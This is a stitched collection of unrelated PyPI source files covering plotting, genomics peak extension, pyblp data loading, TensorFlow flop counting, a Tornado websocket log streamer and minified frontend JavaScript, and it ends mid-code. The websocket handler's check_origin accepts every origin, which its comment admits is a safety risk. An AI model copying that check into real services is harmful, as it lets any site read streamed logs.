# compatible with the first axis.
zvalues[:, 1:] = (values[:, 1:] - ymins[1:]) / deltas[1:] * deltas[
0
] + ymins[0]
# Draw the figure.
fig, host = plt.subplots(figsize=figsize)
axes = [host] + [host.twinx() for i in range(values.shape[1] - 1)]
for i, ax in enumerate(axes):
# Set the tick range manually, adapting from host.
# Note that the actual lines will be plotted according to the
# transformed zvalues above (i.e. all in terms of axis 0.), making
# them essentially cosmetic axes. No lines are actually connected.
ax.set_ylim(ymins[i], ymaxs[i])
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_visible(False)
if ax != host:
ax.spines["left"].set_visible(False)
ax.yaxis.set_ticks_position("right")
# Reset drawing position of non-host axes (i fraction of len cols).
ax.spines["right"].set_position(
("axes", i / (values.shape[1] - 1))
)
# Adjust host axis.
host.set_xlim(0, values.shape[1] - 1) # Remove padding.
host.set_xticks(range(values.shape[1])) # Set ticks before rename.
host.set_xticklabels(list(df.columns), fontsize=labelsize)
host.tick_params(axis="x", which="major", pad=8) # Add vertical pad.
host.spines["right"].set_visible(False)
host.xaxis.tick_top() # Move x-axis labels on top.
host.set_title("test", fontsize=titlesize, pad=20)
# Prepare styles of plot. Overwrite defaults with linecolors, linestyles.
cmap = plt.get_cmap("tab10")
colors = {idx: cmap(i) for i, idx in enumerate(df.index)}
if linecolors is not None:
for key in linecolors.keys():
colors[key] = linecolors[key]
styles = {idx: "solid" for idx in df.index}
if linestyles is not None:
for key in linestyles.keys():
styles[key] = linestyles[key]
    # Plot the lines: for each subject j, chart the row values by column.
for i, j in zip(df.index, range(values.shape[0])):
host.plot(
range(values.shape[1]), # x
zvalues[j, :], # y
c=colors[i],
linestyle=styles[i],
lw=lw,
)
host.legend(
labels=df[columns].index,
loc="center",
bbox_to_anchor=legend_anchor,
frameon=False,
)
if path:
fig.savefig(
path,
dpi=200,
facecolor="white",
bbox_inches="tight",
)
plt.close(fig) | PypiClean |
/pyPINTS-1.1.9-py3-none-any.whl/pints/extension_engine.py |
# PINTS: Peak Identifier for Nascent Transcripts Starts
# Copyright (c) 2019-2022. Li Yao at the Yu Lab.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import sys
import logging
import warnings
try:
import numpy as np
import pandas as pd
from pybedtools import BedTool
from pints.io_engine import get_read_signal, get_coverage_bw, log_assert
from collections import namedtuple
except ImportError as e:
missing_package = str(e).replace("No module named '", "").replace("'", "")
sys.exit("Please install %s first!" % missing_package)
warnings.filterwarnings("error")
logger = logging.getLogger("PINTS - BoundaryExtender")
__EXTENDED_FILE_TPL__ = "_element_{de_tag}bp.bed"
__EXTENDED_DISTAL_FILE_TPL__ = "_element_{de_tag}bp_e.bed"
def main(input_file, layout, div_file, bid_file, single_file, divergent_extension=(60, 60),
unidirectional_extension=(60, 60), promoter_bed=None):
"""
Extend boundaries
Parameters
----------
input_file : str
Path to a bam file
layout : str
        Layout of the bam file
div_file : str
Path to divergent peaks PINTS called
bid_file : str
Path to bidirectional peaks PINTS called
single_file : str
Path to unidirectional peaks PINTS called
divergent_extension : tuple
BPs to be extended for both divergent and bidirectional peaks
unidirectional_extension : tuple
BPs to be extended for unidirectional peaks
promoter_bed : str or None
Path to a bed file which defines promoter regions
Returns
-------
None
"""
de_tag = "_".join(set(map(str, divergent_extension)))
parent_path = os.path.dirname(div_file)
if isinstance(input_file, str):
log_assert(layout is not None,
"Please specify which type of experiment this data was generated from with --exp-type", logger)
pl, mn, _ = get_read_signal(input_file, loc_prime=layout, chromosome_startswith="chr",
output_dir=parent_path, output_prefix=str(os.getpid()))
else:
log_assert(len(input_file[0]) == len(input_file[1]),
"Must provide the same amount of bigwig files for both strands", logger)
pl, mn, _ = get_coverage_bw(bw_pl=input_file[0], bw_mn=input_file[1],
chromosome_startswith="chr",
output_dir=parent_path,
output_prefix=str(os.getpid()))
div = pd.read_csv(div_file, sep="\t", header=None)
div = div.loc[np.logical_or(div[0].isin(pl), div[0].isin(mn)), :]
bid = pd.read_csv(bid_file, sep="\t", header=None)
bid = bid.loc[np.logical_or(bid[0].isin(pl), bid[0].isin(mn)), :]
single = pd.read_csv(single_file, sep="\t", header=None)
single = single.loc[np.logical_or(single[0].isin(pl), single[0].isin(mn)), :]
div["pl_summit"] = 0
div["mn_summit"] = 0
div["element_start"] = 0
div["element_end"] = 0
bid["pl_summit"] = 0
bid["mn_summit"] = 0
single["summit"] = 0
for chromosome in pl:
pl_cov = np.load(pl[chromosome], allow_pickle=True)
mn_cov = np.load(mn[chromosome], allow_pickle=True)
div_sub = div.loc[div[0] == chromosome, :]
bid_sub = bid.loc[bid[0] == chromosome, :]
for sub_df, all_df in zip((div_sub, bid_sub), (div, bid)):
for nr, row in sub_df.iterrows():
pcov = pl_cov[row[1]:row[2]]
mcov = mn_cov[row[1]:row[2]]
cpls = np.where(pcov == pcov.max())[0] + row[1]
cmns = np.where(mcov == mcov.max())[0] + row[1]
all_df.loc[nr, "pl_summit"] = ",".join([str(x) for x in cpls])
all_df.loc[nr, "mn_summit"] = ",".join([str(x) for x in cmns])
# extend boundaries with the following conditions:
                # Find the prominent peaks at basepair resolution (positions above ~30% of the highest peak, with a floor of 5 reads)
# and extend x (60, 200, or others) bps beyond the furthest prominent peak
plb = np.nanmax(pcov)
mlb = np.nanmax(mcov)
pl_threshold = min(plb, max(plb * 0.3, 5))
mn_threshold = min(mlb, max(mlb * 0.3, 5))
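                # e.g. with a maximum of 40 reads on the plus strand,
                # pl_threshold = min(40, max(40 * 0.3, 5)) = 12; with a maximum
                # of 8 reads the floor applies and the threshold is 5.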
pl_probe = np.where(pcov > pl_threshold)[0]
if pl_probe.shape[0] > 1:
cpl = min(pl_probe[-1] + row[1], row[2])
else:
cpl = cpls[-1]
mn_probe = np.where(mcov > mn_threshold)[0]
if mn_probe.shape[0] > 1:
cmn = max(mn_probe[0] + row[1], row[1])
else:
cmn = cmns[0]
f = min(cpl, cmn) - divergent_extension[0]
r = max(cpl, cmn) + divergent_extension[1]
# only update the boundaries if the new ones are larger than the old ones
all_df.loc[nr, "element_start"] = f if f < row[1] else row[1]
all_df.loc[nr, "element_end"] = r if r > row[2] else row[2]
# unidirectional elements are defined as:
# peak region boundaries defined by PINTS
# go upstream 300bp (we assume the opposite peak should be within 300 bp),
# then further +60 or +200bp to define the whole element
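        # e.g. a "+" strand peak at [1000, 1200) with extension (60, 60) becomes
        # element_start = 1000 - 60 - 300 = 640 and element_end = 1200 + 60 = 1260.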
single_sub = single.loc[single[0] == chromosome, :]
for nr, row in single_sub.iterrows():
if row[5] == "+":
f = row[1] - unidirectional_extension[0] - 300
r = row[2] + unidirectional_extension[1]
else:
f = row[1] - unidirectional_extension[0]
r = row[2] + unidirectional_extension[1] + 300
single.loc[nr, "element_start"] = f
single.loc[nr, "element_end"] = r
div = div.loc[:, (0, "element_start", "element_end", 3, 4, 5)]
div.element_start = div.element_start.astype(int)
div.element_end = div.element_end.astype(int)
div.loc[div.element_start < 0, "element_start"] = 0
div["ID"] = ["Divergent" + str(i) for i in list(div.index)]
div["strand"] = "."
div = div[[0, "element_start", "element_end", "ID", 3, "strand", 5, 4]]
bid = bid.loc[:, (0, "element_start", "element_end", 3, 4, 5)]
bid.element_start = bid.element_start.astype(int)
bid.element_end = bid.element_end.astype(int)
bid.loc[bid.element_start < 0, "element_start"] = 0
bid["ID"] = ["Bidirectional" + str(i) for i in list(bid.index)]
bid["strand"] = "."
bid = bid[[0, "element_start", "element_end", "ID", 3, "strand", 5, 4]]
single = single.loc[:, (0, "element_start", "element_end", 3, 4, 5, 7)]
single.element_start = single.element_start.astype(int)
single.element_end = single.element_end.astype(int)
single.loc[single.element_start < 0, "element_start"] = 0
single["ID"] = ["Unidirectional" + str(i) for i in list(single.index)]
div.to_csv(div_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)), sep="\t", index=False,
header=False)
bid.to_csv(bid_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)), sep="\t", index=False,
header=False)
single_obj = BedTool(single.to_csv(sep="\t", index=False, header=False), from_string=True)
# div_obj = BedTool(div.to_csv(sep="\t", index=False, header=False), from_string=True)
# bid_obj = BedTool(bid.to_csv(sep="\t", index=False, header=False), from_string=True)
# single_obj = single_obj.intersect(div_obj, v=True)
# single_obj = single_obj.intersect(bid_obj, v=True)
if promoter_bed is not None:
promoter_bed_obj = BedTool(promoter_bed)
BedTool.from_dataframe(div).intersect(promoter_bed_obj, v=True).saveas(
div_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
BedTool.from_dataframe(bid).intersect(promoter_bed_obj, v=True).saveas(
bid_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
single_obj.intersect(promoter_bed_obj, v=True).saveas(
single_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
single_obj.moveto(single_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)))
housekeeping_files = []
housekeeping_files.extend(pl.values())
housekeeping_files.extend(mn.values())
for hf in housekeeping_files:
if os.path.exists(hf):
try:
os.remove(hf)
except IOError:
pass
def extend(args):
if sum((args.bw_pl is None, args.bw_mn is None)) == 1:
raise ValueError("both of the two arguments --bw-pl --bw-mn are required")
if args.bam_files is not None and not len(args.bam_files) == len(args.divergent_files) == len(
args.bidirectional_files) == len(args.unidirectional_files):
raise ValueError("Number of peak calls from different categories should match")
if args.bw_pl is not None and not len(args.bw_pl) == len(args.bw_mn) == len(args.divergent_files) == len(
args.bidirectional_files) == len(args.unidirectional_files):
raise ValueError("Number of peak calls from different categories should match")
assert len(args.div_ext_left) == len(args.div_ext_right)
assert len(args.unidirectional_ext_left) == len(args.unidirectional_ext_right)
for i in range(1, (len(args.bam_files) if args.bam_files is not None else len(args.bw_pl)) + 1):
groups = {
"divergent_calls": None,
"bidirectional_calls": None,
"unidirectional_calls": None
}
element_types = ("divergent_peaks", "bidirectional_peaks", "unidirectional_peaks")
for et in element_types:
k = "_{index}_{et}.bed".format(index=i, et=et)
for df in args.divergent_files:
if df.find(k) != -1:
groups["divergent_calls"] = df
for bf in args.bidirectional_files:
if bf.find(k) != -1:
groups["bidirectional_calls"] = bf
for sf in args.unidirectional_files:
if sf.find(k) != -1:
groups["unidirectional_calls"] = sf
for j in range(len(args.div_ext_left)):
if args.bam_files is not None:
main(args.bam_files[i - 1], args.bam_parser[i - 1] if len(args.bam_parser) > 1 else args.bam_parser[0],
groups["divergent_calls"], groups["bidirectional_calls"], groups["unidirectional_calls"],
divergent_extension=(args.div_ext_left[j], args.div_ext_right[j]),
unidirectional_extension=(args.unidirectional_ext_left[j], args.unidirectional_ext_right[j]),
promoter_bed=args.promoter_bed)
else:
main((args.bw_pl[i - 1], args.bw_mn[i - 1]), None,
groups["divergent_calls"], groups["bidirectional_calls"], groups["unidirectional_calls"],
divergent_extension=(args.div_ext_left[j], args.div_ext_right[j]),
unidirectional_extension=(args.unidirectional_ext_left[j], args.unidirectional_ext_right[j]),
promoter_bed=args.promoter_bed) | PypiClean |
/pyblp-1.1.0.tar.gz/pyblp-1.1.0/docs/notebooks/api/.ipynb_checkpoints/data-checkpoint.ipynb | # Loading Data Example
```
import pyblp
pyblp.__version__
```
Any number of functions can be used to load the example data into memory. In this example, we'll first use [NumPy](https://numpy.org/).
```
import numpy as np
blp_product_data = np.recfromcsv(pyblp.data.BLP_PRODUCTS_LOCATION, encoding='utf-8')
blp_agent_data = np.recfromcsv(pyblp.data.BLP_AGENTS_LOCATION, encoding='utf-8')
```
Record arrays can be cumbersome to manipulate. A more flexible alternative is the [pandas](https://pandas.pydata.org/) DataFrame. Unlike NumPy, pyblp does not directly depend on pandas, but it can be useful when manipulating data.
```
import pandas as pd
blp_product_data = pd.read_csv(pyblp.data.BLP_PRODUCTS_LOCATION)
blp_agent_data = pd.read_csv(pyblp.data.BLP_AGENTS_LOCATION)
```
Another benefit of DataFrame objects is that they display nicely in Jupyter notebooks.
```
blp_product_data.head()
blp_agent_data.head()
```
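A quick sanity check is also easy with pandas. As a sketch, one might count the number of markets and summarize a couple of columns (the column names `market_ids`, `prices`, and `shares` are assumed here to match the example dataset; adjust them if they differ):
```
blp_product_data['market_ids'].nunique()
blp_product_data[['prices', 'shares']].describe()
```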
[This tutorial](build_blp_instruments.ipynb) demonstrates how the instruments included in this dataset can be constructed from scratch.
| PypiClean |
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/tensorflow/python/profiler/internal/flops_registry.py | """Register flops statistics for various TensorFlow operations.
"""
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
# List of all ops which have implemented flops statistics.
IMPLEMENTED_OPS = set([
# Unary ops
"Reciprocal", "Square", "Rsqrt", "Log", "Neg", "AssignSub", "AssignAdd",
"L2Loss", "Softmax",
# Binary ops
"Add", "Sub", "Mul", "RealDiv", "Maximum", "Minimum", "Pow", "RsqrtGrad",
"GreaterEqual", "Greater", "LessEqual", "Less", "Equal", "NotEqual",
"SquaredDifference",
# Reduction ops
"Mean", "Sum", "ArgMax", "ArgMin", "BiasAddGrad",
# Convolution and pooling
"AvgPool", "MaxPool", "AvgPoolGrad", "MaxPoolGrad", "Conv2DBackpropInput",
"Conv2DBackpropFilter",
# Other ops
"AddN",
# Ops implemented in core tensorflow:
"MatMul", "Conv2D", "DepthwiseConv2dNative", "BiasAdd", "Dilation2D",
])
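# A hedged usage sketch: once these statistics are registered, total flops for a
# TF1-style graph can typically be aggregated through the profiler, e.g.
#   opts = tf.compat.v1.profiler.ProfileOptionBuilder.float_operation()
#   tf.compat.v1.profiler.profile(graph, options=opts)
# (illustrative only; the exact profiler entry point depends on the TF version).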
def _zero_flops(graph, node):
"""Returns zero flops."""
del graph, node # graph and node are unused
return ops.OpStats("flops", 0)
def _list_product(lst):
"""Computes product of element of the list."""
result = 1
for item in lst:
result *= item
return result
################################################################################
# Unary operations
################################################################################
def _unary_op_flops(graph, node, ops_per_element=1):
"""Common code which compute flops for unary operations."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
return ops.OpStats("flops", in_shape.num_elements() * ops_per_element)
@ops.RegisterStatistics("Reciprocal", "flops")
def _reciprocal_flops(graph, node):
"""Compute flops for Reciprocal operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Square", "flops")
def _square_flops(graph, node):
"""Compute flops for Square operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Rsqrt", "flops")
def _rsqrt_flops(graph, node):
"""Compute flops for Rsqrt operation."""
# Rsqrt(x) = 1 / sqrt(x)
return _unary_op_flops(graph, node, ops_per_element=2)
@ops.RegisterStatistics("Log", "flops")
def _log_flops(graph, node):
"""Compute flops for Log operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("Neg", "flops")
def _neg_flops(graph, node):
"""Compute flops for Neg operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("AssignSub", "flops")
def _assign_sub_flops(graph, node):
"""Compute flops for AssignSub operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("AssignAdd", "flops")
def _assign_add_flops(graph, node):
"""Compute flops for AssignAdd operation."""
return _unary_op_flops(graph, node)
@ops.RegisterStatistics("L2Loss", "flops")
def _l2_loss_flops(graph, node):
"""Compute flops for L2Loss operation."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
  # TensorFlow uses an inefficient implementation with (3*N-1) flops;
  # an optimal implementation would use 2*N flops.
return ops.OpStats("flops", in_shape.num_elements() * 3 - 1)
@ops.RegisterStatistics("Softmax", "flops")
def _softmax_flops(graph, node):
"""Compute flops for Softmax operation."""
  # Softmax implementation:
#
# Approximate flops breakdown:
# 2*n -- compute shifted logits
# n -- exp of shifted logits
# 2*n -- compute softmax from exp of shifted logits
return _unary_op_flops(graph, node, ops_per_element=5)
################################################################################
# Binary operations
################################################################################
def _binary_per_element_op_flops(graph, node, ops_per_element=1):
"""Common code which compute flops for binary operations."""
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
return ops.OpStats("flops", out_shape.num_elements() * ops_per_element)
@ops.RegisterStatistics("Add", "flops")
def _add_flops(graph, node):
"""Compute flops for Add operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Sub", "flops")
def _sub_flops(graph, node):
"""Compute flops for Sub operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Mul", "flops")
def _mul_flops(graph, node):
"""Compute flops for Mul operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("RealDiv", "flops")
def _real_div_flops(graph, node):
"""Compute flops for RealDiv operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Maximum", "flops")
def _maximum_flops(graph, node):
"""Compute flops for Maximum operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Minimum", "flops")
def _minimum_flops(graph, node):
"""Compute flops for Minimum operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Pow", "flops")
def _pow_flops(graph, node):
"""Compute flops for Pow operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("RsqrtGrad", "flops")
def _rsqrt_grad_flops(graph, node):
"""Compute flops for RsqrtGrad operation."""
return _binary_per_element_op_flops(graph, node, ops_per_element=4)
@ops.RegisterStatistics("GreaterEqual", "flops")
def _greater_equal_flops(graph, node):
"""Compute flops for GreaterEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Greater", "flops")
def _greater_flops(graph, node):
"""Compute flops for Greater operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("LessEqual", "flops")
def _less_equal_flops(graph, node):
"""Compute flops for LessEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Less", "flops")
def _less_flops(graph, node):
"""Compute flops for Less operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("Equal", "flops")
def _equal_flops(graph, node):
"""Compute flops for Equal operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("NotEqual", "flops")
def _not_equal_flops(graph, node):
"""Compute flops for NotEqual operation."""
return _binary_per_element_op_flops(graph, node)
@ops.RegisterStatistics("SquaredDifference", "flops")
def _squared_difference_flops(graph, node):
"""Compute flops for SquaredDifference operation."""
return _binary_per_element_op_flops(graph, node, ops_per_element=2)
################################################################################
# Reduction ops
################################################################################
def _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0):
"""Common code which compute flops for reduction operations."""
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
num_flops = (in_shape.num_elements() * reduce_flops
+ out_shape.num_elements() * (finalize_flops - reduce_flops))
return ops.OpStats("flops", num_flops)
@ops.RegisterStatistics("Mean", "flops")
def _mean_flops(graph, node):
"""Compute flops for Mean operation."""
# reduction - sum, finalization - divide
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=1)
@ops.RegisterStatistics("Sum", "flops")
def _sum_flops(graph, node):
"""Compute flops for Sum operation."""
# reduction - sum, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("ArgMax", "flops")
def _arg_max_flops(graph, node):
"""Compute flops for ArgMax operation."""
# reduction - comparison, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("ArgMin", "flops")
def _arg_min_flops(graph, node):
"""Compute flops for ArgMin operation."""
# reduction - comparison, no finalization
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
@ops.RegisterStatistics("BiasAddGrad", "flops")
def _bias_add_grad_flops(graph, node):
"""Compute flops for BiasAddGrad operation."""
# Implementation of BiasAddGrad, essentially it's a reduce sum and reshaping:
# So computing flops same way as for "Sum"
return _reduction_op_flops(graph, node, reduce_flops=1, finalize_flops=0)
################################################################################
# Convolution and pooling
# Note: all flops statistics are implemented only for NHWC data format
################################################################################
def _verify_conv_data_format(node):
"""Verifies data format for pooling and convolutional operations."""
# TODO(xpan): P1: Support NCHW
if node.attr["data_format"].s != b"NHWC":
raise ValueError("Only NHWC format is supported in flops computations")
def _pool_flops(graph, node):
"""Common code which compute flops for pooling operations."""
# compute flops for average and max pooling
_verify_conv_data_format(node)
#
# Pooling declaration:
# Inputs:
# - value
# Outputs:
# - output
# Attributes:
# - ksize
# - strides
# - padding
# - data_format
#
  # Pooling implementation:
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
return ops.OpStats("flops", kernel_area * out_shape.num_elements())
@ops.RegisterStatistics("AvgPool", "flops")
def _avg_pool_flops(graph, node):
"""Compute flops for AvgPool operation."""
return _pool_flops(graph, node)
@ops.RegisterStatistics("MaxPool", "flops")
def _max_pool_flops(graph, node):
"""Compute flops for MaxPool operation."""
return _pool_flops(graph, node)
@ops.RegisterStatistics("AvgPoolGrad", "flops")
def _avg_pool_grad_flops(graph, node):
"""Compute flops for AvgPoolGrad operation."""
_verify_conv_data_format(node)
# Pooling gradient implementation:
out_backprop_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
out_backprop_shape.assert_is_fully_defined()
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
  # TensorFlow multiplies each element of the pooling window by a coefficient,
  # then sums them all up, so we have 2 flops per element.
  # A more optimal implementation would apply the division after the summation.
return ops.OpStats("flops",
kernel_area * out_backprop_shape.num_elements() * 2)
@ops.RegisterStatistics("MaxPoolGrad", "flops")
def _max_pool_grad_flops(graph, node):
"""Compute flops for MaxPoolGrad operation."""
_verify_conv_data_format(node)
#
# MaxPoolGrad declaration:
# Inputs:
# - orig_input -- original input tensor (of max_pool)
# - orig_output -- original output tensor (of max_pool)
# - grad -- gradient with respect to output of max_pool
# Outputs:
# - output -- gradient with respect to input of max_pool
# Attributes:
# - ksize
# - strides
# - padding
# - data_format
  # It computes MaxPool first, then one flop per element of the original output
#
kernel_shape = list(node.attr["ksize"].list.i)
kernel_area = _list_product(kernel_shape)
orig_out_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
orig_out_shape.assert_is_fully_defined()
max_pool_ops = kernel_area * orig_out_shape.num_elements()
return ops.OpStats("flops", max_pool_ops + orig_out_shape.num_elements())
@ops.RegisterStatistics("Conv2DBackpropInput", "flops")
def _conv_2d_backprop_input_flops(graph, node):
"""Compute flops for Conv2DBackpropInput operation."""
# Formula:
# batch_size * image_x_dim * image_y_dim * kernel_x_dim * kernel_y_dim
  #   * input_depth * output_depth * 2 / (image_x_stride * image_y_stride)
#
# Where:
# image_x_dim, image_y_dim and input_depth --- size of input to source (no
# backprop) convolution, in other words they are sizes of backprop output.
# output_depth --- number of filters in the original convolution, thus
# depth of backprop input.
# kernel_x_dim and kernel_y_dim --- sizes of filter in spatial dimension
  #   image_x_stride and image_y_stride --- strides of the convolution
#
_verify_conv_data_format(node)
# out_shape = [batch_size, image_y_dim, image_x_dim, input_depth]
out_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
out_shape.assert_is_fully_defined()
# kernel_shape = [kernel_y_dim, kernel_x_dim, input_depth, output_depth]
kernel_shape = graph_util.tensor_shape_from_node_def_name(graph,
node.input[1])
kernel_shape.assert_is_fully_defined()
# strides
strides_shape = list(node.attr["strides"].list.i)
strides_product = strides_shape[1] * strides_shape[2]
return ops.OpStats("flops",
(2 * out_shape.num_elements()
* kernel_shape.num_elements()
/ (out_shape.dims[-1].value * strides_product)))
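# Illustrative worked example for the formula above (not part of the original
# source): with out_shape = [32, 56, 56, 64], kernel_shape = [3, 3, 64, 128]
# and strides of 1, the estimate is
#   2 * (32*56*56*64) * (3*3*64*128) / (64 * 1) = 14,797,504,512 flops,
# which equals batch_size * image_y_dim * image_x_dim * kernel_y_dim
# * kernel_x_dim * input_depth * output_depth * 2.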
@ops.RegisterStatistics("Conv2DBackpropFilter", "flops")
def _conv_2d_backprop_filter_flops(graph, node):
"""Compute flops for Conv2DBackpropFilter operation."""
# Formula same as for Conv2DBackpropInput:
# batch_size * image_x_dim * image_y_dim * kernel_x_dim * kernel_y_dim
  #   * input_depth * output_depth * 2 / (image_x_stride * image_y_stride)
#
_verify_conv_data_format(node)
# image_shape = [batch_size, image_y_dim, image_x_dim, input_depth]
image_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
image_shape.assert_is_fully_defined()
# kernel_shape = [kernel_y_dim, kernel_x_dim, input_depth, output_depth]
kernel_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
kernel_shape.assert_is_fully_defined()
# strides
strides_shape = list(node.attr["strides"].list.i)
strides_product = strides_shape[1] * strides_shape[2]
return ops.OpStats("flops",
(2 * image_shape.num_elements()
* kernel_shape.num_elements()
/ (image_shape.dims[-1].value * strides_product)))
################################################################################
# Other ops
################################################################################
@ops.RegisterStatistics("AddN", "flops")
def _add_n_flops(graph, node):
"""Compute flops for AddN operation."""
if not node.input:
return _zero_flops(graph, node)
in_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
in_shape.assert_is_fully_defined()
return ops.OpStats("flops", in_shape.num_elements() * (len(node.input) - 1)) | PypiClean |
/jot_iris-1.20.7-py3-none-any.whl/listener/logs_web_socket.py | import logging
import asyncio
import tornado
import tornado.websocket
class WebsocketStreamHandler(logging.StreamHandler):
def __init__(self, websocket, on_close, logger):
super().__init__(self)
self.websocket = websocket
self.loop = websocket.loop
self.on_close = on_close
self.logger = logger
self.loop.set_exception_handler(self.exception_handler)
self.write_error = True
def emit(self, record):
self.websocket.send(record)
def write(self, record):
record = record.rstrip()
if record: # and: not self.websocket.closed:
self.loop.call_soon_threadsafe(self.websocket.write_message, record)
def flush(self):
pass
def exception_handler(self, loop, context):
self.on_close()
# Report error only once
if self.write_error:
self.logger.error(context)
self.write_error = False
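# Illustrative wiring sketch (not part of the original module; assumes the
# usual tornado.web / tornado.ioloop imports and an arbitrary URL path):
#
#   app = tornado.web.Application([(r"/ws/logs", LogsWebSocketHandler)])
#   app.listen(8888)
#   tornado.ioloop.IOLoop.current().start()
#
# Once a client connects, records emitted through the root logger are pushed
# over the websocket by the LogsWebSocketHandler defined below, which installs
# a WebsocketStreamHandler as a logging handler.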
class LogsWebSocketHandler(tornado.websocket.WebSocketHandler):
"""
Note that Tornado uses asyncio. Since we are using threads on our backend
we need to use call_soon_threadsafe to get messages through.
"""
def __init__(self, application, request, **kwargs):
self._logger = None
self._stream_handler = None
super().__init__(application, request, **kwargs)
self.loop = asyncio.get_event_loop() # pylint: disable=W0201
def open(self, *args, **kwargs):
"""Called when websocket is opened"""
self._logger = logging.getLogger()
ws_logger = logging.getLogger('websocket')
# Get handler which is configured is logging.yaml
handler = list(filter(
lambda x: x.name is not None and x.name.lower() == 'websocket',
ws_logger.handlers))[0]
weblogger = WebsocketStreamHandler(self, self.on_close, self._logger)
self._stream_handler = logging.StreamHandler(weblogger)
self._stream_handler.formatter = handler.formatter
self._stream_handler.level = handler.level
self._logger.addHandler(self._stream_handler)
self._logger.info('Websocket logger connected')
def on_close(self):
"""Called when websocket is closed"""
if self._stream_handler is not None:
self._logger.removeHandler(self._stream_handler)
self._stream_handler = None
def on_message(self, message):
"""Called when message comes from client through websocket"""
# self.write_message("echo: %r" % message)
def check_origin(self, origin): # pylint: disable=R0201, W0613
"""Checks whether websocket connection from origin is allowed.
        We allow all connections, which is actually a potential safety risk. See:
https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin
"""
return True
def data_received(self, chunk):
pass | PypiClean |
/safegate-pro-frontend-20210805.0.tar.gz/safegate-pro-frontend-20210805.0/hass_frontend/frontend_latest/chunk.21bdce81c44342769b60.js | (self.webpackChunkhome_assistant_frontend=self.webpackChunkhome_assistant_frontend||[]).push([[5374,4074,655,4159,9978,272,4328,7082,129,1422,4823],{99257:(t,e,r)=>{"use strict";r(65233);var o=r(15112),l=r(9672),s=r(87156);(0,l.k)({is:"iron-iconset-svg",properties:{name:{type:String,observer:"_nameChanged"},size:{type:Number,value:24},rtlMirroring:{type:Boolean,value:!1},useGlobalRtlAttribute:{type:Boolean,value:!1}},created:function(){this._meta=new o.P({type:"iconset",key:null,value:null})},attached:function(){this.style.display="none"},getIconNames:function(){return this._icons=this._createIconMap(),Object.keys(this._icons).map((function(t){return this.name+":"+t}),this)},applyIcon:function(t,e){this.removeIcon(t);var r=this._cloneIcon(e,this.rtlMirroring&&this._targetIsRTL(t));if(r){var o=(0,s.vz)(t.root||t);return o.insertBefore(r,o.childNodes[0]),t._svgIcon=r}return null},removeIcon:function(t){t._svgIcon&&((0,s.vz)(t.root||t).removeChild(t._svgIcon),t._svgIcon=null)},_targetIsRTL:function(t){if(null==this.__targetIsRTL)if(this.useGlobalRtlAttribute){var e=document.body&&document.body.hasAttribute("dir")?document.body:document.documentElement;this.__targetIsRTL="rtl"===e.getAttribute("dir")}else t&&t.nodeType!==Node.ELEMENT_NODE&&(t=t.host),this.__targetIsRTL=t&&"rtl"===window.getComputedStyle(t).direction;return 